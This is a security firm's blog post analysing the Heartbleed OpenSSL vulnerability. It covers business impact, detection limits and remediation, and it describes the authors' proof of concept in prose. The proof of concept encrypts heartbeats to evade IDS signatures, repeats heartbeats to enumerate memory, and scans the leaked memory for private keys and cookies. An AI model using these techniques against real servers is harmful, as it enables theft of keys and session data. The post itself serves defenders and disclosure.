Leviathan's (Mandatory) Heartbleed Blog Entry


It's been 5 days since the release of CVE-2014-0160, better known as Heartbleed. This vulnerability in the OpenSSL security suite utilized by a significant portion of the webservers on the Internet - perhaps half a million as well as many other security and encryption products. In this posting, we'll provide some insight and detail for the two main viewpoints, Business Risk and Technology, before walking through some Considerations which we feel are crucial to conclude an organization's response to the vulnerability.

Business Risk

So much of the effort put forward this week has been about the technology and many organizations are lagging in the business understanding necessary to deal with vulnerabilities of this size and nature. Stepping back to take a look at the Impact, understanding Necessary Processes and detailing how to deal with the "but if only we had..." statements which tend to swirl around as we attempt to determine who in the organization is ultimately at fault for the cost of remedy.

Impact to Business

This vulnerability affects what is likely the SOLE means of encrypted transport available to most organizations. Whether the perspective is b2c, c2c or frankly any other direction of communication across the internet, chances are that if it's secured at all, it's secured with SSL/TLS. This means that what was understood (and risk assessed as) the minimum necessary encryption for operations on the Internet hasn't really been all that secure. For some organizations, this is going to require some re-assessment of the risk and for other organizations, continuing with the status quo probably makes the most sense as your competitors will be doing the same.

The HTTPS and Padlock Icon have become too much a part of modern life to face attempting to retrain all the users to look for and be on guard for a new security paradigm. Passwords are hard enough and maintaining the trust of the public has become a necessity.

Traditionally, organizations faced with a breach or the potential of a breach would quickly work to determine the extent and understand what information may have been included in the scope of the breach. Heartbleed brings us a new perspective as there is no meaningful way to understand what sort of information may have been extruded for the (approximately) two year period that the vulnerability existed prior to disclosure. Several organizations (notably, the Canadian Revenue Agency) have taken their secure sites off line as a precaution until they can be sure that they've correctly identified and solved the problem across all systems.

Process Necessary

In many organizations, this issue is uncovering some basic processes that are either absent or non-functioning:

  • who owns SSL keys & certificates
  • is this production support, infrastructure or security's problem
  • enterprise key management
  • incident response
  • crisis communications

Stay tuned for a follow up blog posting on the topic of well-functioning IT Security Processes.

What it would've taken to catch the attack

This vulnerability exists at the encryption layer, below the actual application content. Services such as Apache HTTPD do not log errors at this level unless LogLevel is set to Debug. If the HTTPD LogLevel is set to Debug, Apache will report an SSL packet of type 0x18 when it receives a TLS Heartbeat request. Other services may create generic logs about TLS errors, but these log entries can be caused by a number of common Internet probes. As a result, unless an organization has complete packet captures of an attack as it happened, it's nearly impossible to have detected this attack in advance.

Now that the vulnerability has become public, IDS vendors have put out signatures to detect overly-large TLS Heartbeat Response packets. Some IPS and WAF implementations will block all incoming TLS Heartbeat requests and close the connection.

This again brings back the need to correctly architect specialized security systems in the built environment: IDS, IPS, DLP, and Firewalls.

IDS: An IDS could ID this if sensors are in front of the services that are scanned for this vulnerability. There are issues with creating a signature for this vulnerability though, first being that the heartbeat payload (which includes the vulnerable type field) can be and mostly is encrypted. This means that the only successful way to signature this is to detected it post exploitation and stop extra large heartbeat messages from leaving the perimeter of the network. The implication of this statement is that the location of your IDS sensors becomes much more important. Back in the dark ages, when IDS was declared dead, it was often considered incorrect to place sensors both inside and outside the significant choke points (firewalls and SSL/VPN terminators) because you didn't need to monitor the efficacy of the choke point.

IPS: This requires that the IDS be configured in active mode, able to send TCP resets. And this DOESN'T help if the traffic is UDP as DTLS is vulnerable. they would have to just drop packets, thus causing 'instability'. Amazon has attempted to protect their vulnerable AMI's by injecting CLOSE_NOTIFY Alerts when a heartbeat comes in. Additionally, Sourcefire recommends that you don't use RST packets as you could create a Denial of Service condition locally (in general, although their product supports it). You would have to dynamically adjust firewall rules if you saw this IDS alert, effectively turning your IPS/Firewall combination into a game of whack-a-mole.

DLP: Most DLP implementations would not have caught this because our POC uses encryption on the wire and is decrypted locally. DLP requires that the outgoing traffic is inspected unencrypted, either prior to encryption, or via a gateway service that breaks the end-to-end nature of a proper SSL connection.

What it would've taken to catch the vulnerability

In contemplating whether this class of vulnerability could be detected in an average development organization, the answer is truly unclear. It is very unlikely that it would be caught through normal testing (QA, UAT) of an application. In all likelihood, there are probably only two ways to catch this type of vulnerability: either a careful perusal of patches as they are pushed upstream, or a specifically focused code review by developers who specialize in protocol design and implementation.

Preventing the next one

In order to assess issues that leak this type of information in the future there are some relatively simple extensions that could be added to analysis tools, such as fuzzers. Being able to detect memory leak bugs is a hard problem. How could we instrument a fuzzer to detect this issue in other protocols? Classically fuzzers will detect a 'Fault' via a crash or something similar.


Many have commented that this release feels like a marketing release rather than a closely coordinated vulnerability release. Given the scope of the problem, both hype and potential issues could've been minimized with a proper coordinated release across as many affected vendors as possible. We're not going to start talking about Responsible Disclosure - save that for a different article. It is sufficient to state that for business purposes, coordination of disclosure is much easier to manage than this vulnerability has been. Where possible, participate in (or provide) Bug Bounty programs, work with CERTs to coordinate releases with vendors and try to keep the marketing releases to a minimum - although now that we've had a vulnerability with a logo, it's unlikely we'll be able to go back.


Leviathan's Technical Analysis

The technical staff at Leviathan love to solve complex problems. We dug into this early on Monday and our work continues even now. Our first PoC was built on a modified version of an existing Python TLS library tlslite. Somewhat different from other PoC code that has been released, our version implemented an encrypted heartbeat payload because just like TLS Alerts, heartbeat payloads can be encrypted and HMACed with the session key. We also added the ability to send multiple heartbeats in a single session which allows for quick enumeration of data in memory.

In the course of our research we tested both server software (apache and other) and client software (simple wget all the way to android, xmpp, irc and other clients). Most client/servers that supported heartbeats and were compiled with vulnerable version of openssl would leak memory easily. The most astounding finding we had was a clean install of apache on Debian 7.3 would leak SSL private keys.

Heartbeat Protocol Map


TLS heartbeat messages express themselves in two forms in the protocol. First during the handshake's Client/Server hello messages the heartbeat extension is added to the extension table. If both the client and server include the heartbeat extension type then both ends know that they can send a heartbeat message at any time during the post handshake session. This is critical for our PoC and the attack itself because it means that after the session is opened it is possible to repeat the heartbeat any number of times to enumerate memory.

The second instance of the heartbeat extension is the actual packet that is sent in the session. This message is formatted much like any other TLS packet type such as an alert or application data. The total length and type (0x18) are plaintext while the body CAN be encrypted plus an added HMAC. This is similar to an 'encrypted alert' vs a non-encrypted alert. Finally there is the inner body of the message which contains a type (request or response), a length, a payload, and finally padding - much like an ICMP ping message that allows the requester to send arbitrary data in the heartbeat to verify upon its return from the peer. The vulnerability exists in the inner length field, which specifies the length of the payload. If sent a small payload and a large length, OpenSSL will read beyond the bounds of the buffer. This data is then quickly returned. This vulnerability is classified by MITRE as a "buffer over-read", which in this case leads to what you can think of as a variant of an "arbitrary memory read". An attacker requests that OpenSSL read and return more memory than has been allocated to it, and due to the lack of bounds checking OpenSSL is happy to oblige.

One of the major issues we identified with many of the public PoCs that have come out since the heartbleed announcement is that the inner packet of the heartbeat was not encrypted, thus giving IDS signature writers a false sense of being able to match a large heartbeat and block it. We established that using our PoC, both the request and response data are encrypted making it harder to signature the packet until post exploitation and then blocking the data as it leaves the perimeter.

Developing a PoC that Extracts Private Keys

The code for this proof of concept and the automatic private key finding is available at Forked tlslite. We have been able to easily modify this script to search for any data we are interested in, including HTTP headers (Cookie, Authorization and others). Possible sensitive data exposed by clients is harder to gauge, any client build with OpenSSL could potentially leak information. While were unable to test it due to the extra OpenVPN protocol layers we did see the client sending heartbeat messages. This is most likely due to the need for something like a heartbeat in DTLS (used by OpenVPN).


There are a number of facets of this vulnerability (and class of vulnerability) that are not well understood and are being lost in the general noise around the server side of the vulnerability.


More than just patching

In addition to patching, regenerating private keys, re-issuing certificates, and revoking previous certificates on your web servers, there is much work to do.

Other Servers: This affects everything that uses the unpatched OpenSSL library for SSL or TLS - not just webservers but mail servers, VPN servers, unified communication servers, and more. And not just for services that run on TCP. DTLS on UDP is also affected.

Evaluate Versions Carefully: Many instances do not do a good job of providing conclusive detail on the version running.

Examine Libraries: There are all kinds of places that you might find the openssl library. On Windows systems, do a search for ssleay32.dll and check the Properties|Details tab. Be aware of products that may have statically compiled OpenSSL into the executables you're using.

Inform Customers: Inform them not only of the fact that you've fixed the issue, but also do a little awareness training and teach them how to turn on checks for certificate revocation.

Client Issues: Emphasis in the last few days has been on vulnerable servers with little mention of client-side applications. We are actively investigating the impact on client-side applications - expect a follow up blog post to go into some detail.

To Developers and IT Operations

As we mature in developing secure software, we have to take a good hard look at some of these fundamental parts of our infrastructure. If you are leveraging one of these products to support a commercial service, make sure that you're going through this code as you would your own and that when you find issues, you are sending patches upstream. Static linking of libraries like libssl will insulate you from change to interfaces and functionality but the approach can pose a significant threat to your application and to your clients if your security notification and patching processes are not in-line with the affected libraries. Seriously consider using dynamic linking to reduce your customer's reliance on your patching and notification process for common libraries.

OpenSSL - the organization

OpenSSL, like many of the fundamental pieces of infrastructure utilized by millions daily is a volunteer effort. If each company that makes use of OpenSSL were to donate even $5 - there would be enough money available to the OpenSSL foundation to hire the experienced staff necessary to conduct formal third-party code audits. Non-profit organizations like the Center for Internet Security, FIRST, and MITRE should take a hard look at how they can provide more support in software and protocol evaluation.

Thanks to all of the Leviathan staff that contributed to this posting:

Paul Brodeur, Daniel McCarney, Baron Oldenburg, Josh Pitts, Parker Thompson, Chad Thunberg.